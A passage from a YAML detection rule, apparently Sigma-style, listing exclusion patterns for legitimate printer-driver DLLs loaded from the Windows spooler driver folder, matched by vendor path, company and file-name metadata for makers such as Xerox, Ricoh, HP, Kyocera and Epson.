'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FUUIM???.DLL' # (FUUIM13A.DLL)\n Company:\n - 'Xerox'\n - 'Xerox Corporation'\n - 'Fuji Xerox Co., Ltd.'\n - 'Fuji Xerox Co.,Ltd.'\n - 'Xerox Co., Ltd.'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYTJ_F.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYXJ_C.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYXJ_D.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYTJ_U.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYQJ_C.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOBJUJ_F.DLL\n # C:\\Windows\\System32\\spool\\drivers\\w32x86\\3\\KOAYXJ_X.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYQJ_T.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOBJUJ_U.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOB__J_G.DLL\n exclusion_konica_minolta:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KO????_?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOBDrvAPIW64.exe'\n - 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KB??????.DLL' # (KBDLMA8A.DLL, KBLGMA8A.DLL, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KO??????.DLL' # (KOAZ8JAR.DLL, KOFXPA1C.DLL, ...)\n Company:\n - 'KONICA MINOLTA, INC.'\n - 'KONICA MINOLTA BUSINESS TECHNOLOGIES, INC.'\n OriginalFileName:\n - 'KOAYTJ_?.dll'\n - 'KO????_?'\n - 'KO????_?.dll'\n - 'KMWOW64.exe'\n - 'KB??????.DLL'\n - 'KO??????.DLL'\n - 'KO??????'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYTJ_O.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYXJ_O.DLL\n # C:\\Windows\\System32\\spool\\drivers\\w32x86\\3\\KOAYXJ_B.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYQJ_O.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOBJUJ_O.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYXJ_N.DLL\n exclusion_konica_minolta_no_company_name:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KO????_?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KO??????.DLL' # (KOAYTJAO.DLL)\n OriginalFileName:\n - 'OAPIDrvLib*.dll' # (OAPIDrvLib42.dll, OAPIDrvLib521.dll, OAPIDrvLib5211.dll, OAPIDrvLib50.dll)\n - 'kmbd??.dll'\n - 'kmbdprtntfy13_own.DLL'\n - 'kmbdprtntfy13_own_x64.DLL'\n - 'xerces-c_?_?.dll'\n - 'KO????_?.dll'\n InternalName:\n - 'OAPIDrvLib*.dll'\n - 'kmbd'\n - 'kmbdprtntfy13_own'\n - 'kmbdprtntfy13_own_x64'\n - 'xerces-c_?_?.dll'\n - 'KO????_?'\n exclusion_konica_minolta_without_infos:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\KO????_?.DLL' # (KOAYQJ_W.DLL)\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\acpdfui251.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\acpdfui500.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\acpdf251.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\acpdf300.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\acpdf500.dll\n exclusion_amyuni:\n ImageLoaded:\n - 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\acpdfui???.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\acpdf???.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cdintf*.dll' # (cdintf450_64.dll)\n OriginalFileName:\n - 'ACFPDFUI.DLL'\n - 'ACFPDF.DLL'\n - 'CDINTF.DLL'\n InternalName:\n - 'ACFPDFUI.DLL'\n - 'ACFPDF.DLL'\n - 'CDINTF'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRPSMA80.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BROHLA5A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRLGCB0A_000C.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRDSMA80.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRUICB0A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BROCHB0A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRENCB0A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRRICB0A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRPRF13A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BSQ70V.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BSQ70L.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\bsp15bI6.DLL\n exclusion_brother:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\BR*.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\BS*.DLL' # (BSP98NUI.DLL, BST200U6.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\bsp?????.DLL' # (bsp15bI6.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\BRL?????_??-??.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PT*.DLL'\n Company:\n - 'Brother Industries Ltd.'\n - 'Brother Industries, Ltd.'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\PRTRes.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\PRTDrvUI_SF.dll\n exclusion_hprt:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PRTRes.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PRTDrvUI_SF.dll'\n Company:\n - 'HPRT'\n - 'Xiamen Hanin Electronic Technology Co.,Ltd.'\n OriginalFileName:\n - 
'PRTRes.dll'\n - 'PRTDrvUI.dll'\n InternalName:\n - 'PRTRes.dll'\n - 'PRTDrvUI'\n Product:\n - 'HPRT Resource DLL'\n - 'HPRT Driver UI'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZDNFRA56.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZDNdrv56.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZDNENG56.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZDNui56.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRAENG56.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZEBENG56.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ZEBui56.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\BRAdrv56.dll\n exclusion_euro_plus:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ZDN???5?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???drv5?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???ENG5?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???FRA5?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\???ui5?.dll' # ZDNui56.DLL, PNXui56.dll, ZEBui56.dll, BRAui56.dll, TCOui56.dll\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\zdn*.dll' # zdnPMU.dll / zdnPMS.dll / zdnPM64U.dll\n Company: 'Euro Plus d.o.o.'\n Product:\n - 'Thermal Printers Driver'\n - 'Windows Printer Driver'\n\n exclusion_euro_plus_xpl:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Tools?PLx64.dll' # ToolsEPLx64.dll / ToolsZPLx64.dll\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ToolsCPCLx64.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ToolsKIOSKx64.dll'\n Description|contains: 'Tools Library' # EPL/CPL/ZPL/CPCL Tools Library\n InternalName|contains: 'Tools' # EPL/CPL/ZPL/CPCL Tools\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA3Jcd.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA3Jus.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA3Jgs.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\rica1jcd.dll\n # 
C:\\Windows\\System32\\spool\\drivers\\x64\\3\\rica1jcp.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\rica1jui.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\rica1jcj.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricipp.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA5Hcp.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA5Hcj.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA5Hcd.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ricA5Hui.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICFAX64UI.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RIC662X.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RIC562K.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\rica5Xct.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\watermark.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\headerfooter.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\overlaywatermark.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\jobhook.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\borderline.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\RICOH_DRV\\RICOH MP C5504 PCL 6\\dlz20200408113920\\popup.dll\n exclusion_ricoh:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ric*.dll' # (ricipp.dll, RICFAX64UI.dll, RIC662X.dll, RIC562K.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ric*.exe' # (ricu0htl.exe)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\0riu0???.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RD*.dll' # (RD01Kd64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\mfricr??.dll' # (mfricr64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RIA*.DLL' # 
(RIAFUI1.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\watermark.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\headerfooter.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\overlaywatermark.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\jobhook.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\borderline.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RICOH_DRV\\\\*\\popup.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\E?????64.DLL' # (E424UI64.DLL, E424RE64.DLL, E224UI64.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\eng????.DLL' # eng53Ku\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fra????.DLL' # (fra50Fu.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\GLS*.DLL' # (GLS603L.DLL, GLS503K.DLL, GLS603C.DLL, GLS603WU.DLL, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Infa4dgs.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\SPC*.DLL' # (SPC82d64.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\rc4man??.dll' # (rc4man64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\trackid??.dll' # (trackid64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RIP*.DLL' # (RIPSRES.DLL, RIPSUI.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\SP??????.dll' # (SP430d64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\MP??????.dll' # (MPC22d64.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\NRG*.DLL' # (NRG53EWU.dll, NRG53EX.DLL, NRG53EZU.DLL, NRG511WU.DLL, NRG511X.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\IFX*.DLL' # (IFXSEP64.EXE, IFXSHLNK64.DLL)\n Company:\n - 'RICOH'\n - 'RICOH COMPANY'\n - 'RICOH COMPANY, LTD'\n - 'RICOH COMPANY,LTD.'\n - 'RICOH Company, Ltd.'\n - 'RICOH CO.,Ltd.'\n - 'Ricoh Co., Ltd.'\n - 'RICOH Corp'\n - 'Agfa Monotype Corp.'\n - 'Monotype Imaging Inc.'\n\n exclusion_ricoh_without_infos:\n ImageLoaded:\n - 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ric?????.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\0riu0???.dll' # (0riu03ur.dll)\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EFXUI09A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EFXMI09A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EFXGI09A.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EBAPIX64.DLL\n exclusion_seiko_epson:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\E*.dll' # (EP7UIP00.DLL, EPSET64.DLL, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\E_*' # (E_YMAIUAE.DLL, E_YERSKKE.DLL, E_YBEWKKE.DLL, E_YBA7KKE.DLL, E_34ULC1BE.DLL, E_33BCS1BE.EXE)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sehmpz.xrs'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sehmpz??.xrs' # (sehmpzir.xrs)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sehmpz??.dll' # (sehmpziu.dll)\n Company:\n - 'SEIKO EPSON CORPORATION'\n - 'SEIKO EPSON CORP.'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\mxdwdrv.dll\n # On Windows 8.1, MXDWDRV.dll is signed via catalogue.\n exclusion_mxdwdrv_signed:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\mxdwdrv.dll'\n Company: 'Microsoft Corporation'\n #InternalName: 'MXDWDRV.DLL'\n OriginalFileName: 'MXDWDRV.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\PSCRIPT5.DLL\n # On Windows 8, PSCRIPT5.DLL is signed via catalogue.\n exclusion_pscript5_signed:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PSCRIPT5.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\?_PSCRIPT5.DLL' # (d_pscript5.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PDFILLPSCRIPT5.DLL'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'PSCRIPT5.DLL'\n # 5115cb182da89d2366709f553bf82f41826d2520ca6f9c99b10c23098522d9e3\n exclusion_ssm1:\n ImageLoaded: 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ss??m.dll' # (ssi2m.dll, ssi5m.dll, ssk4m.dll, ssm1m.dll)\n OriginalFileName: 'PSCRIPT.DLL'\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\PS5UI.DLL\n # On Windows 8, PSCRIPT5.DLL is signed via catalogue.\n exclusion_ps5ui_signed:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PS5UI.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\\\*PS5UI.DLL' # (PDFILLPS5UI.DLL, pdf995ps5ui64.dll)\n Company: 'Microsoft Corporation'\n OriginalFileName: 'PS5UI.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\UniDrvUI.dll\n # On Windows 8.1, UniDrvUI.DLL is signed via catalogue.\n exclusion_unidrvui_signed:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UniDrvUI.DLL'\n Company: 'Microsoft Corporation'\n #InternalName: 'UNIDRVUI.DLL'\n OriginalFileName: 'UNIDRVUI.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\UNIDRV.DLL\n # On Windows 8.1, UNIDRV.DLL is signed via catalogue.\n exclusion_unidrv_signed:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UNIDRV.DLL'\n Company: 'Microsoft Corporation'\n #InternalName: 'UNIDRV.DLL'\n OriginalFileName: 'UNIDRV.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\UNIRES.DLL\n # On Windows 8.1, UNIRES.DLL is signed via catalogue.\n exclusion_unires_signed:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UNIRES.DLL'\n Company: 'Microsoft Corporation'\n #InternalName: 'UNIRES.DLL'\n OriginalFileName: 'UNIRES.DLL'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\PrintConfig.dll\n exclusion_printconfig:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\PrintConfig.dll'\n Company: 'Microsoft Corporation'\n #InternalName: 'PRINTCONFIG.DLL'\n OriginalFileName: 'PRINTCONFIG.DLL'\n exclusion_tsprint:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\tsprint.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'TSPRINT.DLL'\n\n exclusion_mxdwdui:\n ImageLoaded: 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\mxdwdui.dll'\n Company: 'Microsoft Corporation'\n OriginalFileName: 'mxdwdui.dll'\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\sxr1m.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\sxp2m.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\sxp2mdu.dll\n exclusion_pscript_windows_2003:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sx*dll' # (sxr1m.dll, sxp2m.dll, sxp2mdu.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sr*.dll' # (srp3m.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\YOUNGI.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ss?6c.dll' # (ssl6c.dll, sst6c.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\us005.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\spd__.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Thml4.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ssp1mdu.dll' # (ssp1mdu.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ml285*.dll' # (ml285pdu.dll, ml285pd.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\usp02.dll'\n Company: 'Windows (R) Server 2003 DDK provider'\n\n exclusion_hp_fax:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HP*_FaxPCSendRenderPlugin.dll'\n Company: 'HP Inc.'\n OriginalFileName: 'FaxPCSendRenderPlugin.dll'\n\n exclusion_null_size:\n # We must use size: '-1'\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\ADUIGP.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fpmvpr_ui.dll'\n Company: ''\n Product: ''\n OriginalFileName: ''\n InternalName: ''\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\sxp2mu2.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\sxp2mu.dll\n exclusion_xerox_missing_pe_info:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sxp2mu2.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\sxp2mu.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\FX6?????-?_????.XRS' 
# (FX6BAALT-4_2052.XRS, FX6BAALT-4_1042.XRS, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\FX6?????-?.XRS' # (FX6BEALS-1.XRS, FX6SOALT-4.XRS, ...)\n Company: ''\n Product: ''\n OriginalFileName: ''\n InternalName: ''\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOB__J_1.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYXJ_W.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOBJUJ_W.dll\n exclusion_konica_minolta_missing_pe_info:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOB__J_1.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOAYXJ_W.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOBJUJ_W.dll'\n Company: ''\n Product: ''\n OriginalFileName: ''\n InternalName: ''\n exclusion_longhorn:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\51FBE.Dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\51FBEX64.Dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\OPUCU001.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\GIE???.DLL' # (GIE6AD.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\R?E6??.DLL' # (R8E6AD.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\LKNEW4*.Dll' # (LKNEW4.Dll, LKNEW4E.DLL, LKNEW4UI.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\SV1NPTPC.DLL'\n Company:\n - 'Windows (R) Codename Longhorn DDK provider'\n - 'Windows (R) Win 7 DDK provider'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYQJ_Y.DLL\n exclusion_monotype:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\RIC???c.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOA???_?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\OK*.DLL' # (OKIXL.DLL, OKBBAXD.DLL, OKIPCL.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KO????_?.EXE' # (KOAYQJ_W.EXE)\n Company:\n - 'Monotype Imaging, Inc.'\n - 'Monotype Imaging Inc.'\n exclusion_okidata:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\O???_U?.DLL'\n - 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\OP??????.DLL' # (seen OPHCWNXT.DLL, opjobinf.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\OK*.DLL' # (OKPSUI.DLL, OKBL_UI.DLL)\n Company:\n - 'Oki Data Corporation'\n - 'Oki Data Corportation'\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpb6sy3536_x64xps.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpb6sy3536_x64enus.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpb6sy3536_x64dlg.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpb6sy2073_x64gui.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpb6sy2073_x64gui.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpcst140.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpmux083.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpcdmc64.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\hpbmtxr31.dll\n exclusion_hp:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hp*.dll' # (HPFUI50.DLL, hpcst140.DLL, HP1006U.DLL , hpmdp196.dll, hpcui196.dll, hpipr7sm.dll, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cioum.dll'\n Company:\n - 'Monotype Imaging Inc.'\n - 'Hewlett-Packard Corporation'\n - 'Hewlett Packard Corporation'\n - 'HP'\n - 'Hewlett-Packard'\n - 'Hewlett-Packard ' # additional space at the end...\n - 'Hewlett-Packard Company'\n - 'HP Inc.'\n\n exclusion_hp_without_company:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HPM????????.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpm??????.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpm?????.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpbcfgre.DLL'\n OriginalFileName:\n - 'HPM????????.dll' # (seen HPM1210FPSU.dll, HPM1210FPSD.dll)\n - 'HPM??????.dll' # (HPM1210SD.dll)\n - 'hpm?????.dll' # (hpmsl140.dll)\n - 'hpbcfgre.DLL'\n\n exclusion_hp_without_infos:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpcc????.DLL' # (hpcc6140.DLL)\n - 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpixpsui.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpcp????.dll' # (hpcpp255.dll, hpcpn170.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\hpzpi???.DLL' # (hpzpi5k4.DLL, hpzpi4wm.DLL)\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n\n exclusion_software_2000:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\HP1006M?.DLL' # HP1006MP.dll / HP1006MT.dll\n Company: 'Software 2000 Limited'\n\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KFUC409U.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KFUU409U.DLL\n exclusion_kyocera:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KM??????.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KF??????.DLL' # (KFUU643C.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KMPipe??.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KY*.DLL' # (KYFONT4.DLL, KYRES14.DLL, KyUPUI.dll, KyURes.dll, KyURTA.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KAU?????.DLL' # (KAUU34JU.DLL)\n Company:\n - 'KYOCERA MITA'\n - 'KYOCERA Document Solutions Inc.'\n - 'Kyocera Mita Europe B.V.'\n OriginalFileName:\n - 'KF??????.dll' # (KFUU643C.dll)\n - 'KM??????.dll'\n - 'KM??????' 
